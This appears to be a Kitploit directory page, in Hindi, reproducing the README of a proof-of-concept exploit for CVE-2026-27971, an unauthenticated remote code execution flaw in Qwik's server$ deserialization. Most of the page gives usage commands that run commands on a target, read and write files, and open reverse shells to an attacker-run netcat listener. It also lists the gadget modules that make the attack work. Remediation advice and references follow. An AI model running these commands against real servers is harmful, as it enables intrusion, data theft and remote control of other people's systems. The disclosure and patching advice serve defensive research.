Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-27971_POC — CVE-2026-27971 qwik rce | Kitploit
उपकरण/GitHubGitHub/ghalendar/cve-2026-27971_poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubghalendar/cve-2026-27971_poc

CVE-2026-27971_POC

CVE-2026-27971 qwik rce

रिपॉजिटरी देखें
51 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-27971 — Qwik server$ बिना प्रमाणीकरण के RCE PoC

[!WARNING] इस रिपॉजिटरी में एक सक्रिय रिमोट-कोड-एक्जीक्यूशन प्रूफ ऑफ कॉन्सेप्ट है। इसका उपयोग केवल उन प्रणालियों पर करें जिनके आप मालिक हैं या जिनका परीक्षण करने की आपको स्पष्ट अनुमति है। लेखक अनधिकृत उपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।

CVE-2026-27971 / GHSA-p9x5-jp3h-96mm के लिए एक स्टैंडअलोन Python प्रूफ ऑफ कॉन्सेप्ट, जो Qwik server$ RPC डिसीरियलाइज़ेशन तंत्र में एक बिना प्रमाणीकरण के रिमोट कोड निष्पादन भेद्यता है।

यह PoC एक सक्रिय मार्कर प्रोब कर सकता है, कमांड निष्पादित कर सकता है, टेक्स्ट फ़ाइलें पढ़ या लिख सकता है, और Linux या Windows लक्ष्यों पर रिवर्स शेल का अनुरोध कर सकता है। यह केवल Python मानक पुस्तकालय का उपयोग करता है।

भेद्यता सारांश

टूल डाउनलोड करें
फ़ील्डमान
उत्पादQwik — npm पैकेज @builder.io/qwik
प्रभावित संस्करण<= 1.19.0
पैच किया गया संस्करण1.19.1
भेद्यताअसुरक्षित server$ डिसीरियलाइज़ेशन के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन
रनटाइम शर्तरनटाइम पर require() उपलब्ध होना चाहिए
CWECWE-502 — अविश्वसनीय डेटा का डिसीरियलाइज़ेशन
गंभीरताक्रिटिकल — CVSS 4.0: 9.2
वेक्टरCVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

एक तैयार application/qwik-json अनुरोध सर्वर-साइड मॉड्यूल और निर्यातित प्रतीक का संदर्भ दे सकता है। कमजोर Qwik संस्करण रनटाइम require() के माध्यम से एक अपंजीकृत QRL को हल कर सकते हैं और इसे बिना प्रमाणीकरण के लागू कर सकते हैं। यह PoC लक्ष्य के node_modules में पहले से मौजूद एक संगत प्रक्रिया-निष्पादन निर्यात तक पहुंचने का प्रयास करता है।

आवश्यकताएँ

ऑपरेटर:

  • Python 3.
  • उस सटीक Qwik रूट तक नेटवर्क पहुंच जो server$/Qwik JSON अनुरोध को संसाधित करता है।
  • रिवर्स-शेल कार्यक्षमता का परीक्षण करते समय लक्ष्य से पहुंच योग्य एक लिसनर।

लक्ष्य:

  • @builder.io/qwik <= 1.19.0 का उपयोग करने वाली एक कमजोर Qwik तैनाती।
  • एक रनटाइम जहाँ require() उपलब्ध है।
  • node_modules में सुलभ एक संगत गैजेट मॉड्यूल और निर्यात।
  • सेवा प्रक्रिया PATH में node उपलब्ध है।
  • अनुरोधित कमांड या फ़ाइल संचालन के लिए पर्याप्त सेवा-खाता अनुमतियाँ।

कोई तृतीय-पक्ष Python पैकेज आवश्यक नहीं है।

त्वरित आरंभ

root@kitploit:~
git clone https://github.com/Ghalendar/CVE-2026-27971_POC.git
cd CVE-2026-27971_POC
python3 exploit_combat.py --help

अनुरोध भेजे बिना बिल्ट-इन गैजेट्स की सूची बनाएं:

root@kitploit:~
python3 exploit_combat.py --list-gadgets

एक सक्रिय मार्कर प्रोब चलाएं और प्रत्येक बिल्ट-इन गैजेट का प्रयास करें:

root@kitploit:~
python3 exploit_combat.py -t http://127.0.0.1:3000 --gadget auto --probe

[!IMPORTANT] --probe निष्क्रिय संस्करण पहचान नहीं है। यह रिमोट कोड निष्पादन का प्रयास करता है और लक्ष्य प्रक्रिया से एक मार्कर प्रिंट करके इसकी पुष्टि करता है।

उपयोग उदाहरण

एक कमांड निष्पादित करें:

root@kitploit:~
python3 exploit_combat.py -t http://127.0.0.1:3000 --gadget auto --CMD "node -p process.platform"

एक UTF-8 टेक्स्ट फ़ाइल पढ़ें:

root@kitploit:~
python3 exploit_combat.py -t http://127.0.0.1:3000 --gadget auto --read package.json

एक UTF-8 टेक्स्ट फ़ाइल लिखें और सत्यापित करें:

root@kitploit:~
python3 exploit_combat.py -t http://127.0.0.1:3000 --gadget auto --write qwik-poc.txt --content "authorized lab test"

एक स्थायी लिसनर शुरू करने के बाद रिवर्स शेल का अनुरोध करें:

root@kitploit:~
nc -lvnp 4444
root@kitploit:~
python3 exploit_combat.py -t http://127.0.0.1:3000 --gadget auto --lhost 10.10.10.1 --lport 4444 --callback

जब स्वचालित OS पहचान अनुपयुक्त हो तो Windows रिवर्स-शेल पेलोड को बाध्य करें:

root@kitploit:~
python3 exploit_combat.py -t http://127.0.0.1:3000 --gadget auto --OS windows --lhost 10.10.10.1 --lport 4444

स्क्रिप्ट एक लिसनर शुरू नहीं करती है। --callback प्री-चेक शेल पेलोड भेजने से पहले एक अलग TCP कनेक्शन खोलता और बंद करता है, इसलिए एक ऐसे लिसनर का उपयोग करें जो एक से अधिक कनेक्शन स्वीकार कर सके।

CLI संदर्भ

विकल्पविवरण
-t URL, --target URLसटीक लक्ष्य URL। डिफ़ॉल्ट: http://localhost:3000। रूट स्वचालित रूप से खोजा नहीं जाता है।
--probeएक मार्कर पेलोड को सक्रिय रूप से निष्पादित करें और OS पहचान का प्रयास करें।
-c CMD, --CMD CMDNode.js child_process.execSync() के माध्यम से एक कमांड निष्पादित करें।
--read PATHfs.readFileSync() का उपयोग करके एक UTF-8 टेक्स्ट फ़ाइल पढ़ें।
--write PATH --content TEXTएक टेक्स्ट फ़ाइल लिखें, उसे वापस पढ़ें, और परिणाम की तुलना करें। मूल निर्देशिकाएँ नहीं बनाई जाती हैं।
--list-gadgetsबिल्ट-इन गैजेट नाम प्रिंट करें और नेटवर्क अनुरोध के बिना बाहर निकलें।
--lhost IPरिवर्स-शेल मोड सक्षम करें और कॉलबैक पता सेट करें।
--lport PORTकॉलबैक पोर्ट सेट करें। डिफ़ॉल्ट: 4444।
--rev-allपहले स्वीकृत HTTP अनुरोध के बाद रुकने के बजाय प्रत्येक रिवर्स-शेल वेरिएंट भेजें।
--callbackरिवर्स-शेल पेलोड भेजने से पहले आउटबाउंड TCP पहुंच का परीक्षण करें।
--OS {auto,linux,windows}रिवर्स-शेल पेलोड परिवार चुनें। डिफ़ॉल्ट: auto।
--gadget SPECauto, एक बिल्ट-इन नाम, या कस्टम <module>#<symbol> का उपयोग करें। डिफ़ॉल्ट: cross-spawn.sync।
--arg-style {argv,command,shell}कस्टम <module>#<symbol> गैजेट के लिए तर्क शैली।
--timeout SECONDSक्लाइंट-साइड HTTP टाइमआउट। डिफ़ॉल्ट: 30।
--verify-sslTLS प्रमाणपत्र और होस्टनाम सत्यापन सक्षम करें। सत्यापन डिफ़ॉल्ट रूप से अक्षम है।

पार्सर में क्रिया मोड परस्पर अनन्य नहीं हैं। प्रति आह्वान --probe, --CMD, --read, --write, या --lhost में से एक का उपयोग करें।

बिल्ट-इन गैजेट

नाममॉड्यूल और निर्यातशैली
cross-spawn.sync./node_modules/cross-spawn/index#syncargv
cross-spawn.index-js./node_modules/cross-spawn/index.js#syncargv
execa.sync./node_modules/execa/index#syncargv
execa.index-js.sync./node_modules/execa/index.js#syncargv
execa.commandSync./node_modules/execa/index#commandSynccommand
execa.index-js.commandSync./node_modules/execa/index.js#commandSynccommand
node-cmd.runSync./node_modules/node-cmd/cmd#runSyncshell
node-cmd.cmd-js.runSync./node_modules/node-cmd/cmd.js#runSyncshell

--gadget auto इन गैजेट्स को सूचीबद्ध क्रम में परीक्षण करता है। एक कस्टम गैजेट निम्नानुसार प्रदान किया जा सकता है:

root@kitploit:~
python3 exploit_combat.py -t http://127.0.0.1:3000 --gadget "./node_modules/package/path#exportName" --arg-style argv --probe

महत्वपूर्ण सीमाएँ

  • एक नकारात्मक प्रोब यह प्रमाण नहीं है कि लक्ष्य पैच किया गया है। यह एक गलत रूट, एक लापता या असंगत गैजेट, एक नेटवर्क/TLS त्रुटि, फ़िल्टरिंग, या एक अलग तैनाती लेआउट का संकेत दे सकता है।
  • डिफ़ॉल्ट गैजेट cross-spawn.sync है, स्वचालित खोज नहीं। जब लक्ष्य निर्भरता लेआउट अज्ञात हो तो --gadget auto का उपयोग करें।
  • टूल में कुकीज़, प्रमाणीकरण हेडर, प्रॉक्सी, या मनमाने कस्टम हेडर के लिए कोई विकल्प नहीं है।
  • फ़ाइल संचालन टेक्स्ट-उन्मुख हैं। --read UTF-8 की अपेक्षा करता है, और --write बाइनरी डेटा के लिए अभिप्रेत नहीं है।
  • सापेक्ष पथ Qwik प्रक्रिया कार्यशील निर्देशिका से हल किए जाते हैं। सभी संचालन Qwik सेवा खाते की अनुमतियों के साथ चलते हैं।
  • रिवर्स-शेल सफलता संदेश इंगित करते हैं कि शोषण HTTP अनुरोध स्वीकार किया गया था; वे यह साबित नहीं करते कि कॉलबैक प्राप्त हुआ था।
  • --rev-all लक्ष्य पर कई प्रक्रियाएँ या कॉलबैक शुरू कर सकता है। इसका उपयोग केवल एक पृथक लैब में करें।
  • प्रक्रिया निकास कोड मुख्य रूप से प्रोब और ट्रांसपोर्ट हैंडलिंग को दर्शाते हैं, न कि रिमोट कमांड की निकास स्थिति या कार्यशील शेल की उपस्थिति को।
  • टूल स्थापित Qwik संस्करण की पहचान नहीं करता है और इसे निर्भरता सूची के प्रतिस्थापन के रूप में उपयोग नहीं किया जाना चाहिए।

उपचार

@builder.io/qwik को 1.19.1 या बाद के संस्करण में अपग्रेड करें, लॉकफ़ाइल अपडेट करें, एप्लिकेशन का पुनर्निर्माण करें, और सभी सर्वर आर्टिफैक्ट को पुनः तैनात करें। अकेले एक संगत गैजेट को हटाना अंतर्निहित Qwik भेद्यता के लिए पूर्ण सुधार नहीं है।

संदर्भ

  • Qwik सुरक्षा सलाहकार — GHSA-p9x5-jp3h-96mm
  • GitHub सलाहकार डेटाबेस — CVE-2026-27971
  • पैच किया गया Qwik 1.19.1 रिलीज़
  • अपस्ट्रीम फिक्स कमिट
  • CVE रिकॉर्ड
  • NVD प्रविष्टि

कानूनी नोटिस

यह परियोजना सुरक्षा अनुसंधान, रक्षात्मक सत्यापन, और अधिकृत परीक्षण के लिए प्रदान की गई है। स्पष्ट अनुमति के बिना सिस्टम के खिलाफ इसका उपयोग न करें।